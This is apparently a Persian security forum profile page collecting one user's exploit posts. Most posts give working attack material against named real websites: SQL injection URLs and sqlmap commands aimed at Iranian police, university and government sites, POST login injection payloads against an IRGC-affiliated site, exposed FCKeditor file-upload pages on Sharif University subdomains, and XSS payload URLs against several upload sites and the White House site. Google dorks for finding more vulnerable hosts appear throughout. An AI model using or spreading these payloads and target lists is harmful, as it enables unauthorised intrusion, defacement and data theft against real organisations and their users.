رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

E1.Coders

New Member
  • تعداد ارسال ها

    17
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    6
  • Country

    روسیه

آخرین بار برد E1.Coders در مرداد 16

E1.Coders یکی از رکورد داران بیشترین تعداد پسند مطالب است !

اعتبار در سایت

11 Good

2 دنبال کننده

درباره E1.Coders

آخرین بازدید کنندگان نمایه

بلوک آخرین بازدید کننده ها غیر فعال شده است و به دیگر کاربران نشان داده نمی شود.

  1. E1.Coders

    HighCMS/HighPortal v12.x SQL Inj

    به قول دوستمون HEY SCRIPT KIDS " لمر کوچولو" SHUT UP NOW https://packetstormsecurity.com/files/167170/HighCMS-HighPortal-12.x-SQL-Injection.html
  2. # Exploit Title: HighCMS/HighPortal v12.x SQL Inj Type : WEBAPPS "HighCMS/HighPortal" Platform : ASP.NET # Date : 4/23/2022 # Exploit Author : E1.Coders # Software Link : https://aryanic.com/page/portal # Version : v12.x # Category : Webapps # Tested on: Linux/Windows # Google Dork: inurl:index.jsp?siteid=1&fkeyid=&siteid=1&pageid= # Google Dork: <©2022 HighCMS/HighPortal" Step 1: Enter the address of the "page" that has the problem of sql injection attacks http: //TARGET/index.jsp? Siteid = 1 & fkeyid = & siteid = 1 & pageid = 6528 Default credentials. ( is True ) STEP 2 : Send the following request " or Use sqlmap : python sqlmap.py -u "https://www.ihu.ac.ir/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=11211" TARGET : https://www.ihu.ac.ir/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=11211 https://vu.qhu.ac.ir/index.jsp?pageid=579 https://sqev.ir/index.jsp?pageid=234 http://rcii.ir/index.jsp?pageid=928 https://ssaa.ir/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=1642 https://www.ibto.ir/?stid=1&fkeyid=&stid=1&fkeyid=&siteid=1&pageid=7343 https://police.ir/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528
  3. [+] Exploit Title: POLICE.IR website SQL Injection |[+] Exploit Author: E1.Coders |[+] E-Mail : [email protected] |[+] Tested on: Windows 10 |[+] Vendor site: https://police.ir/index.jsp |[+] Demo: https://police.ir/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528 |[+] EXploit : https://police.ir/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528%22
  4. https://vu.qhu.ac.ir/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=833%22 [+] Exploit Title: Quran and Hadith University website SQL Injection |[+] Exploit Author: E1.Coders |[+] E-Mail : [email protected] |[+] Tested on: Windows 10 |[+] Vendor site: https://vu.qhu.ac.ir/index.jsp |[+] Demo: https://vu.qhu.ac.ir/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=833 |[+] EXploit : https://vu.qhu.ac.ir/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=833%22
  5. E1.Coders

    پیدا کردن پسورد گوشی آیفون

    بهترین روش انلایک کردن استفاده از امکان خود icloud ... اپل از سایت اپل برو تنظیمات امنیتی اونجا انلایک کن
  6. E1.Coders

    سایت شریف باگ RFU

    سایت شریف دارای باگ RFU است که یک آسیب پذیری فوق العاده خطرناک در وب اپلیکیشن ها است. که به هکر این اجازه را میدهد تا بتواند فایلهای آلوده مثل شل و بک دور ... را بدون هیچ مجوزی و به راحتی برای دستکاری سیستم و سرو و خرابکاری در سایت اپلود کند " و دسترسی کامل بگیرد. http://sharif.edu/~civilinfo/civil/civil.sharif.ir/html/js/editor/editora2f7.html?p_l_id=7324055&p_main_path=%2Fc&editorImpl=fckeditor&initMethod=initEditor&cssPath=%2Fhtml%2Fthemes%2Fcivil%2Fcss&cssClasses=portlet+portlet-my-account از سایت داغون و ادمین تعطیل شریف RFU اینم بقیه باگ http://aict.sharif.ir/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html http://www.mech.sharif.ir/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html http://el.sharif.ir/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html http://srrc.sharif.ir/html/js/editor/editor.jsp?p_l_id=719803&p_main_path=%2Fc&editorImpl=fckeditor&initMethod=initEditor&cssPath=%2Fhtml%2Fthemes%2Fsharif-classic%2Fcss&cssClasses=portlet+portlet-slide_content_image http://htso.sharif.ir/html/js/editor/editor.jsp?p_l_id=552449&p_main_path=%2Fc&editorImpl=fckeditor&initMethod=initEditor&cssPath=%2Fhtml%2Fthemes%2Fsharif%2Fcss&cssClasses=portlet+portlet-tagged-content http://sharif.edu/~civilinfo/civil/civil.sharif.ir/html/js/editor/editora2f7.html?p_l_id=7324055&p_main_path=%2Fc&editorImpl=fckeditor&initMethod=initEditor&cssPath=%2Fhtml%2Fthemes%2Fcivil%2Fcss&cssClasses=portlet+portlet-my-account http://vpaa.sharif.ir/html/js/editor/editor.jsp?p_l_id=375980&p_main_path=%2Fc&editorImpl=fckeditor&initMethod=initEditor&cssPath=%2Fhtml%2Fthemes%2Fsharif%2Fcss&cssClasses=portlet+ http://www.sharif.ir/html/js/editor/fckeditor/editor/filemanager/browser/default/frmfolders.html
  7. E1.Coders

    سایت شریف باگ RFU

    سایت شریف دارای باگ RFU است که یک آسیب پذیری فوق العاده خطرناک در وب اپلیکیشن ها است. که به هکر این اجازه را میدهد تا بتواند فایلهای آلوده مثل شل و بک دور ... را بدون هیچ مجوزی و به راحتی برای دستکاری سیستم و سرو و خرابکاری در سایت اپلود کند " و دسترسی کامل بگیرد. http://sharif.edu/~civilinfo/civil/civil.sharif.ir/html/js/editor/editora2f7.html?p_l_id=7324055&p_main_path=%2Fc&editorImpl=fckeditor&initMethod=initEditor&cssPath=%2Fhtml%2Fthemes%2Fcivil%2Fcss&cssClasses=portlet+portlet-my-account
  8. که یک آسیب پذیری فوق العاده خطرناک در وب اپلیکیشن هاست RFU این سایت دارای باگ و به هکر این اجازه را میدهد تا بتواند فایلهای آلوده مثل شل و بک دور ... را بدون هیچ مجوزی و به راحتی برای دستکاری سیستم و سرو و خرابکاری در سایت اپلود کند و موجب می شود هکر از وب سایت دسترسی کامل بگیرد
  9. E1.Coders

    Iranian Uploader WEB Site 

    |[+] Exploit Title: Iranian Uploader WEB Site |[+] Google Dork: intext:"powered by Mihalism Multi Host" |[+] Vendor site: http://www.mihalism.com/ |[+] Demo: Xss https://www.picoup.ir/viewer.php?is_random=45041&file=%3CBODY+onload%3D%22javascript%3Aalert%28%27E1.Coders%27%29%22%3E http://upcity.ir/viewer.php?is_random=45041&file=%3CBODY+onload%3D%22javascript%3Aalert%28%27E1.Coders%27%29%22%3E http://img2.shahrsakhtafzar.com/viewer.php?is_random=45041&file=%3CBODY+onload%3D%22javascript%3Aalert%28%27E1.Coders%27%29%22%3E https://www.up.avastarco.com/viewer.php?is_random=45041&file=%3CBODY+onload%3D%22javascript%3Aalert%28%27E1.Coders%27%29%22%3E http://jans-upload.gigfa.com/viewer.php?is_random=45041&file=%3CBODY+onload%3D%22javascript%3Aalert%28%27E1.Coders%27%29%22%3E&i=1 "><script>alert("E1.Coders")</script> |[+] Exploit Author: E1.Coders |[+] Exploit Author: [email protected] |[+] Telegram Chanele : https://t.me/s/Und3rGr0ndT3am |[+] Tested on: Windows & Linux
  10. ######################################################################################################################### # # # Exploit Title : MCI Portal SQL INJECT Vulnerabilities # # # # Author : E1.Coders # # # # Contact : E1.Coders [at] Mail [dot] RU # # # # Portal Link : www.MCI.IR # # # # Security Risk : High # # # # Description : All target's IRanian GOVerment websites # # # # DorK : ""inurl:mci.ir/Notrino-Comics?story="" # # # ######################################################################################################################### # # # Expl0iTs: # # # # 1: https://www.mci.ir/Notrino-Comics?story=1' # # # # 2: https://www.mci.ir/Notrino-Comics?story=2' # # # ######################################################################################################################### # # # | Security Is JOCK | # # # # | Russian Black Hat | # # # #########################################################################################################################
  11. Title: ====== New XSS Vulnerabilities WhiteHouse Gov Service - Persistent Web Vulnerability CWE : CWE-79 Date: ===== 2022/03/23 References: =========== https://www.whitehouse.gov/?side-nav-select=https://www.whitehouse.gov/dpc/about-the-director/&s=1 Introduction: ============= http://www.whitehouse.gov/ Abstract: ========= The researcher (E1.Coders) discovered a persistent script code injection vulnerability on the WhiteHouse Gov website. Status: ======== Published Exploitation-Technique: ======================= Remote Severity: ========= High Details: ======== A persistent script code injection vulnerability is detected on the WhiteHouse Gov website. The vulnerability allows remote attackers to implement/inject own malicious script code (persistent) on a web service main module of the website. The successful exploitation of the vulnerability results in hijacking of user-,admin- or -backend sessions, manipulation of profile content, redirect to external malicious targets(websites), defacement & can lead to malware infiltration via petition. Vulnerable Module(s): [+] <input name="SIGNUP" type="hidden" value= [+] dpc/about-the-director/&s= Proof of Concept: ================= The vulnerabilities can be exploited by remote attackers. For demonstration or reproduce ... PoC: https://www.whitehouse.gov/?side-nav-select=https://www.whitehouse.gov/dpc/about-the-director/&s=javascript:alert(3849723) INPUT FORM: <div style="display: none"> <input name="SIGNUP" type="hidden" value=""> <input name="SIGNUP_SRC" type="hidden" value=""> <input name="LANGUAGE" type="hidden" value="en"> </div> Risk: ===== The security risk of the persistent script code inject is estimated as high(+). Credits: ======== Vulnerability Research Laboratory - E1.Coders ([email protected]) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. E1.Coders disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- => E1.Coders has reported several times in the form of a bunny report on «YOU» and hackerone.com and privately (contact form) to fix the problem, and so far he has not heard any answer after several months to fix it. E1.Coders or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if E1.Coders or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- E1.Coders. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by E1.Coders or its suppliers.
  12. ################################################## ################################################## ##################### # # # Exploit Title : Sharif University of Technology has XSS vulnerabilities # # # # Author : E1.Coders # # # # Contact : E1.Coders [at] Mail [dot] RU # # # # Portal Link : sharif.ir (http://ce.sharif.ir) # # # # Tested ON : Persian language version Host # # # # Security Risk : ~[Medium]~ # # # # Description : Description: All domains and subdomains of these websites can be targeted # # # # DorK : "sharif.ir index.php?section="" # # # # # # # ################################################## ################################################## ##################### Details : the vulnerable file is "search" XSS Expl0iTs : http://ce.sharif.ir/courses/83-84/2/ce254/index.php?section=XSS Codes Dem0 : http://ce.sharif.ir/courses/83-84/2/ce254/index.php?section=%3Cscript%3Ealert(%27E1.Coders%27)%3C/script%3E&file=read&id=5 Dem0 : https://ce.sharif.ir/courses/83-84/2/ce254/index.php?section=%3Cscript%3Ealert(%27E1.Coders%27)%3C/script%3E
  13. BUG XSS https://www.whitehouse.gov/?side-nav-select=https://www.whitehouse.gov/dpc/about-the-director/&s=%3Cscript%3Ealert(%E2%80%98XSS%E2%80%99)%3C/script%3E
  14. E1.Coders

    Gerdab.ir SQL Injection

    ######################################################################################################################### # # # Exploit Title : Site affiliated To the intelligence agency Revolutionary Guards of the Islamic Republic of Iran (IRGC) SQL INJECTION Vulnerability # # # # Author : E1.Coders # # # # Contact : E1.Coders [at] Mail [dot] RU # # # # Portal Link : www.my.gerdab.ir # # # # Security Risk : Medium # # # # Description : All target's IRanian Military websites # # # # DorK : ""inurl:reports/status?s=" "site:my.gerdab.ir/reports/status?s=" # # # ######################################################################################################################### # # # Expl0iTs: # # # # address (refer url): https://gerdab.ir/fa/archive?service_id=9&sec_id=63 # # vulnerabillity : GET SQL INJECT BOOLEAN Based string # # action url: https://gerdab.ir/fa/archive?sec_id=63&service_id=99999999 -------------------------------------------------- # # vuln type : SQLInjection # # refer address : https://gerdab.ir/fa/archive?service_id=9&sec_id=63 # # request type : COOKIE # # action url : https://gerdab.ir/fa/archive?sec_id=63&^service_id=9 # # parameter : service_id # # description : COOKIE SQL INJECTION BooleanBased String # # POC : https://gerdab.ir/fa/archive?sec_id=63&^service_id=9%27) aNd 8634682=8634682 aNd (%276199%27)=(%276199 --------------------------------------- # vuln type : SQLInjection # # refer address : https://gerdab.ir/fa/archive?service_id=9&sec_id=63 # # request type : GET # # action url : https://gerdab.ir/fa/archive?sec_id=63&service_id=9 # # parameter : service_id # # description : GET SQL INJECTION BooleanBased Integer # # POC : https://gerdab.ir/fa/archive?sec_id=63&service_id=9 RLIKE (case when 8446715=8446715 then 0x74657374696E70757476616C7565 else 0x28 end) # # ------------------------------------------------------ # # # vuln type : SQLInjection # # refer address : https://my.gerdab.ir/login # # request type : POST # # action url : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&password=2420819&captcha=4844505&phone=99999999 # # parameter : phone # # description : POST SQL INJECTION BooleanBased Integer # # POC : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&password=2420819&captcha=4844505&phone=99999999/**/oR/**/8871966=8871966/**/aNd/**/7193=7193 # ------------------------------------------------ # # vuln type : SQLInjection # # refer address : https://my.gerdab.ir/login # # request type : POST # # action url : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&password=2420819&captcha=4844505&phone=2087986 # parameter : phone # # description : POST SQL INJECTION BooleanBased Integer # # POC : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&password=2420819&captcha=4844505&phone=2087986/**/RLIKE/**/(case/**/when/**//**/7338747=7338747/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end) # ------------------------------------------------ # # vuln type : SQLInjection # # refer address : https://my.gerdab.ir/login # # request type : POST # # action url : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&captcha=4844505&password=99999999 # # parameter : password # # description : POST SQL INJECTION BooleanBased String # # POC : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&captcha=4844505&password=99999999%27/**/oR/**/4563301=4563301/**/aNd/**/%276199%27=%276199 # ------------------------------------------------ # # vuln type : SQLInjection # # refer address : https://my.gerdab.ir/login # request type : POST # action url : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&captcha=4844505&password=2420819 # parameter : password # description : POST SQL INJECTION BooleanBased Integer # POC : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&captcha=4844505&password=2420819/**/RLIKE/**/(case/**/when/**//**/8423820=8423820/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end) # ------------------------------------------------ # # vuln type : SQLInjection # refer address : https://my.gerdab.ir/login # request type : POST # action url : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&password=2420819&captcha=99999999 # # parameter : captcha # # description : POST SQL INJECTION BooleanBased Integer # # POC : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&password=2420819&captcha=99999999/**/oR/**/6019831=6019831--%20 # ------------------------------------------------ # # vuln type : SQLInjection # # refer address : https://my.gerdab.ir/login # request type : POST # action url : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&password=2420819&captcha=4844505 # parameter : captcha # description : POST SQL INJECTION BooleanBased String # POC : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&password=2420819&captcha=4844505%27/**/RLIKE/**/(case/**/when/**//**/2804470=2804470/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end)/**/and/**/'7917'='7917 ------------------------------------------------ # # # 1: https://my.gerdab.ir/reports/status?s=1' # # # # 2: https://my.gerdab.ir/reports/status?s%22=%221%22 # # # ######################################################################################################################### # # # | Security Is JOCK | # # # # | Russian Black Hat | # # # #########################################################################################################################

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...